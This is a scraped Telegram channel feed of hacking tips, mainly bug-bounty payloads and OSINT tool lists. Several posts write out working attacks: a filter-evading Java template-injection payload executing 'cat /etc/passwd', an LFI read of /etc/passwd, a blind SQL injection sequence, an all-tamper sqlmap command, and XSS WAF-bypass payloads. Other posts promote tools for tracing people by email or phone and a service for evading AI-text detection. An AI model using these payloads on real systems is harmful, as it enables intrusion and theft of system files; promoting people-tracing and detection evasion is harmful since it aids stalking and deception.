en
Feedback
Termux All Command [Telegram Group]

Termux All Command [Telegram Group]

Open in Telegram

Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full

Show more
1 185
Subscribers
+324 hours
+187 days
+4830 days
Posts Archive
๐Ÿ” 7 Free Online #OSINT Tools GHUNT - Google account info Sherlock - nickname enumeration Holehe - search accounts by email Ignorant - search accounts by phone Whois domain lookup WhatsApp profile info HudsonRock - email leaks lookup Check them out: osint.rocks

๐ŸŽ‰just got LFI at one of the Hackerone program. ๐Ÿคtip: in multipart request there was parameter "PATH" simply entered /etc/pa
๐ŸŽ‰just got LFI at one of the Hackerone program. ๐Ÿคtip: in multipart request there was parameter "PATH" simply entered /etc/passwd and got this great response.

BigBountyRecon ๐ŸŒ Tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. ๐Ÿ”— https://lnkd.in/gAVUpQr4

Bug : Remote Code Execution Parameter : /parameter/invoice/{payload}/2627627 Payload : ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} Context : first of all i have tried SSTI ${7*7} got 49 so i confirmed that there is possibility of SSTI. Later on determined it's JAVA. just trying more and more got .

Blind Boolean-Based SQLi . a'-IF(LENGTH(database())>100,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error . a'-IF(LE
Blind Boolean-Based SQLi . a'-IF(LENGTH(database())>100,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error . a'-IF(LENGTH(database())>11,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error . a'-IF(LENGTH(database())>10,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error . a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . a'-IF(LENGTH(database())>8,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . a'-IF(LENGTH(database())>7,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . a'-IF(LENGTH(database())>6,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . a'-IF(LENGTH(database())>5,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . Database Length is == 10 characters

Open Perplex New free AI search engine and chat assistant. Based on Meta LLama 3 70B. Can be used as an alternative to ChatGPT, Perplexity, You etc. openperplex.com

Web Vulnerability Resource - XSS Unferstanding XSS Attack https://lnkd.in/dg9THu25 XSS Filter Evasion by johnermac https://lnkd.in/dk_gpSRP Payloads XSs Evasion by citybasebrooks https://lnkd.in/d4YQjBxE XSS Resource by BruteLogic https://lnkd.in/dcVG-RSX XSS Challegens https://lnkd.in/dhcbNe6d https://lnkd.in/dif8SVjK How to Find XSS by HackerOne https://lnkd.in/dvqNm5bT Learning about Cross Site Scripting (XSS) https://lnkd.in/dYETX2VV XSS CheatSheet by Portswigger Labs https://lnkd.in/dAxxwj4 Hacktivity XSS by HackerOne https://lnkd.in/dNNM86wx XSS Explained by NahamSec https://lnkd.in/dJiTs2td XSS Stored, Blind, Reflected and DOM by InsiderPhD https://lnkd.in/d9KzwBfd Web Hacking Beyond Alert by Wild West https://lnkd.in/djbgjFS8 XSS Tools XSSTRIKE https://lnkd.in/dJkuhQ4X Dalfox https://lnkd.in/dp_UnjGM XSSMap https://lnkd.in/dgfqdEhj FinDOM XSS https://lnkd.in/dffQm67D

Here we are! The Compressive SQLMap Command for You!. sqlmap -u "target.com" --crawl=3 --level=5 --risk=3 --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,commalesslimit,commalessmid,commentbeforeparentheses,concat2concatws,equaltolike,escapequotes,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,overlongutf8,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,varnish,versionedkeywords,versionedmorekeywords,xforwardedfor" --dbs --random-agent --batch --threads=10 --output-dir=InjectionResult --time-sec=10 --retries=3 --flush-session --fresh-queries -v 3

HTML Sanitizer Bypass Cloudflare leads to XSS ๐Ÿ›  payload: '<00 foo="XSS-CLick--%20/ hashtag#infosec hashtag#cybersec hashtag#bugbountytips

Digital Methods Tools Archive 60+ free online tools for various highly specialized tasks in online investigations. For example: - Wikipedia Edits IP Localizer - Robots.txt Discovery - Amazon Related Product Graph and more. https://wiki.digitalmethods.net/Dmi/ToolDatabase 

๐Ÿ” urldna.io โ€“ A Free OSINT Tool for URL Analysis urldna.io offers detailed information about any URL, including: Screenshots SSL certificates IP addresses Title/body text Cookies Technologies HTTP requests Headers Console messages Meta tags Try it now: urldna.io

Twitter Tools View username, display name and bio history of any Twitter user. twitter.lolarchiver.com Partly free. Works well, but not always accurately. Use in combination with other similar tools (like UserSearch etc).

๐Ÿ”–afrog - Vulnerability Scanner afrog is a fast and reliable tool for finding and fixing vulnerabilities. It supports custom PoCs and detects issues like CVEs, unauthorized access, and file reading. ๐Ÿ“Œ GitHub: github.com/zan8in/afrog

A Javascript Polyglot for Cross-Site Scripting (XSS) ๐Ÿ›ก

๐—๐’๐’ ๐›๐ฒ๐ฉ๐š๐ฌ๐ฌ ๐ฎ๐ฌ๐ข๐ง๐  ๐”๐ง๐ข๐œ๐จ๐๐ž ๐ž๐ฌ๐œ๐š๐ฉ๐ž ๐ฐ๐ข๐ญ๐ก ๐‡๐“๐Œ๐‹ ๐„๐ง๐ญ๐ข๐ญ๐ข๐ž๐ฌ. ๐•๐ฎ๐ฅ๐ง : ๐Ÿ. " ๐จ๐ง๐œ๐ฅ๐ข๐œ๐ค=๐ฅ๐จ๐œ๐š๐ญ๐ข๐จ๐ง.๐ก๐ซ๐ž๐Ÿ="๐ฃ๐š๐ฏ๐š๐ฌ๐œ๐ซ๐ข๐ฉ๐ญ:๐Ÿ"> First try, ๐—ผ๐—ป๐—ฐ๐—น๐—ถ๐—ฐ๐—ธ (event handler) passes. However, ๐—น๐—ผ๐—ฐ๐—ฎ๐˜๐—ถ๐—ผ๐—ป.๐—ต๐—ฟ๐—ฒ๐—ณ does not pass and is blocked by waf. ๐Ÿ. " ๐จ๐ง๐œ๐ฅ๐ข๐œ๐ค=๐ฅ\๐ฎ{๐Ÿ”๐…}๐œ๐š๐ญ๐ข\๐ฎ{๐Ÿ”๐…}๐ง.๐ก๐ซ๐ž๐Ÿ="๐ฃ๐š๐ฏ๐š๐ฌ๐œ๐ซ๐ข๐ฉ๐ญ:๐Ÿ"> Second try, bypassing ๐—น๐—ผ๐—ฐ๐—ฎ๐˜๐—ถ๐—ผ๐—ป.๐—ต๐—ฟ๐—ฒ๐—ณ with unicode escape. \๐˜‚{๐Ÿฒ๐—™} is the unicode escape of the letter ๐—ผ. Payload bypass ๐—น๐—ผ๐—ฐ๐—ฎ๐˜๐—ถ๐—ผ๐—ป.๐—ต๐—ฟ๐—ฒ๐—ณ with unicode escape successfully passed. However, our payload gets output like "๐—ผ๐—ป๐—ฐ๐—น๐—ถ๐—ฐ๐—ธ=๐—น\\๐˜‚{๐Ÿฒ๐—™}๐—ฐ๐—ฎ๐˜๐—ถ\\๐˜‚{๐Ÿฒ๐—™}๐—ป.๐—ต๐—ฟ๐—ฒ๐—ณ=> When we added a backslash from the previous unicode escape, the web app automatically added another backslash which caused our payload to not work. ๐Ÿ‘. " ๐จ๐ง๐œ๐ฅ๐ข๐œ๐ค=๐ฅ&#๐Ÿ—๐Ÿ;๐ฎ{๐Ÿ”๐…}๐œ๐š๐ญ๐ข&#๐Ÿ—๐Ÿ;๐ฎ{๐Ÿ”๐…}๐ง.๐ก๐ซ๐ž๐Ÿ="๐ฃ๐š๐ฏ๐š๐ฌ๐œ๐ซ๐ข๐ฉ๐ญ:๐Ÿ"> Our next experiment bypassed the backslash using the HTML Entities encode. &#๐Ÿต๐Ÿฎ; is the HTML Entities encode of the backslash. Our payload passes and the XSS is successfully triggered on the Firefox browser. ๐…๐ฎ๐ฅ๐ฅ ๐ฉ๐š๐ฒ๐ฅ๐จ๐š๐: " onclickโ€‹=l\u{6F}cati\u{6F}n.href="javascriptโ€‹:alert(1)">

๐Ÿšฉ Bug Bounty Hunting: Guide to an Advanced Earning Method๐Ÿ‘‡ https://drive.google.com/drive/folders/1t-hTqg0-02t0cnc5SypHnb8t3CfE3bXU ๐Ÿšฉ Bug Bounty: Android Hacking๐Ÿ‘‡ https://mega.nz/#F!h4hHGIYa!2ta4n94iQNnVzpJToVPLVw ๐Ÿšฉ Bug Bounty: Web Hacking๐Ÿ‘‡ https://drive.google.com/file/d/1Z6vX133ZA5DGIhrBJAuJfMJ2Gu7Y4C21/edit ๐Ÿšฉ Burp Suite Bug Bounty Web Hacking from Scratch๐Ÿ‘‡ https://drive.google.com/file/d/1eWy5HVLw3tvw4lfsT7kYb5dnD1l0RsoW/view ๐Ÿšฉ Bug Bounty Hunting - Offensive Approach to Hunt Bugs๐Ÿ‘‡ https://mega.nz/#F!Ge4gmSIL!lW-7XC2DnEKryjXie35APw!mGw30bCI

HOW TO BYPASS AI DETECTION Imagine a world where AI-generated content blends seamlessly with human creativity, making it impossible to distinguish between the two. Fascinating, isnโ€™t it? Now you can bypass detection systems effortlessly while maintaining the art of writing. > Website: bypassgpt.ai

Here are the top 40 YouTubers in cybersecurity: 1. David Bombal 2. Null Byte 3. NetworkChuck 4. CYBER TRUTH 5. HackerSploit 6. IppSec 7. John Hammond 8. Cyber Insecurity 9. The Cyber Mentor 10. LearnCyberSecurity 11. GeraldAuger 12. HackerSploit 13. Sami Laiho 14. Navin Reddy 15. The PC Security Channel 16. Security Tube 17. OTW Cybersecurity 18. CyberTalkinators 19. Trace Labs 20. The Cyber Mentor 21. LiveOverflow 22. Cyber Secrets 23. HackerOne 24. HackingeBooks CTF 25. Seytonic 26. Cybr 27. Adrian Crenshaw 28. BlackHat Python 29. Cybr Expert 30. TechSavvy 31. TechNintra 32. SecurityIdiots 33. HackerOne 34. SemmleDev 35. Hackers.Mayuri 36. Hak5 37. Gabriel Alonso 38. CyberMentor 39. STร–K 40. Cyber Weapons Lab #ig1code #imagine1code #chatgpt #StackOverflow #Youtube #youtubeshorts #youtubechannel